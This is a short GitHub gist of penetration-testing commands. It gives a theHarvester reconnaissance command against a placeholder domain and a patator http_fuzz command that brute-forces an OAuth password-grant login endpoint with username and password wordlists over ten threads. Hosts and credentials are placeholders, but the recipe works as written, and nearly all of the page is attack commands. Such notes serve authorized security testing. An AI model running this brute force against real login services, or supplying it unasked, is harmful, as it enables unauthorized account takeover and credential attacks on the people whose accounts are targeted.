Skip to content

Instantly share code, notes, and snippets.

@epomatti
Created March 5, 2023 17:27
Show Gist options
  • Save epomatti/7aaa57c20a0f919988530b8aec1c04a3 to your computer and use it in GitHub Desktop.
Save epomatti/7aaa57c20a0f919988530b8aec1c04a3 to your computer and use it in GitHub Desktop.
theHarvester and patator bruteforce
theHarvester -d <domain> -b all
patator http_fuzz \
url="https://<...>" \
method=POST \
header="Authorization: Basic <...>" \
body="username=FILE0&password=FILE1&grant_type=password" \
resolve=<domain>:<ip> \
0="usernames.txt" \
1="passwords.txt" \
--threads=10
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment